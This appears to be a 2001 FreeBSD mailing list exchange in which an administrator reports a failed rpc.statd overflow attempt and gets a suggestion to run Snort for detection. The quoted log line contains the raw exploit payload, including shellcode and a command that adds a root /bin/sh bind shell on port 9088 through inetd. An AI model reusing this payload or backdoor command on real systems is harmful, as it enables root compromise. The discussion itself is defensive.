From owner-freebsd-questions Thu Jan 4 8:22: 2 2001 From owner-freebsd-questions@FreeBSD.ORG Thu Jan 4 08:21:58 2001 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from smtp.kka.com (smtp.kka.com [63.141.65.2]) by hub.freebsd.org (Postfix) with ESMTP id 29A0837B400 for ; Thu, 4 Jan 2001 08:21:58 -0800 (PST) Subject: Re: hack attempt (again) - help To: Guy Helmer Cc: freebsd-questions@FreeBSD.ORG X-Mailer: Lotus Notes Release 5.0.2a November 23, 1999 Message-ID: From: Eric_Stanfield@kenokozie.com Date: Thu, 4 Jan 2001 10:16:31 -0600 X-MIMETrack: Serialize by Router on Notes1st/Keno(Release 5.0.4 |June 8, 2000) at 01/04/2001 10:16:34 AM MIME-Version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: quoted-printable Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Snort compiled, configured and running in less than 10 minutes. The ruleset looks very good for my purposes. Thanks for the tip, this is a= good find. -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D- Eric Stanfield, K2Access Keno Kozie and Associates 222 N LaSalle #1500 Chicago, IL 60606 (312) 332-3000 = =20 Guy Helmer = =20 cc: freebsd-questions@Fr= eeBSD.ORG =20 Subject: Re: hack attemp= t (again) - help =20 01/04/01 09:26 = =20 AM = =20 = =20 = =20 On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote: > Alright this jerkoff has once again attempted to hack one of my freeb= sd > machines by trying what I assume is a buffer overflow to rpc: > > Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: > ^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7= =FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x > %08x %08x %08x %08x %08x %08x %08x > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^P=EBK^M- > > v=ACM-^C=EE M-^M^(M-^C=C6 M- ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C= =EB#M- ^=B41=C0M-^C=EE > M-^HF'M-^HF*M-^C=C6 M-^HF=ABM- F=B8=B0+, M- =F3M-^MN=ACM-^MV=B8=CD= M-^@1=DBM- > =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait roo= t /bin/sh -i" >> > /tmp/m; /usr/sbin/inetd /tmp/m; > > The interesting bit is what he (she?) is attempting to sneak in at th= e end > of the garbage sent to the port. > > I've given the system a thorough check and this seems to have been a second > failed attempt. I'm now annoyed, however, and would like to be able = to at > least log what address this stuff is originating from. Can anyone suggest > something from the ports that would do the trick? I've disabled nfs/= rpc > but I'm sure the hacker will come knocking again. snort with a current copy of the rule set from http://www.whitehats.com/ids/index.html ought to detect this (and lots = of other script kiddie attempts). Guy -- Guy Helmer, Ph.D. Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.com http://www.palisadesys.com/~ghelmer = To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message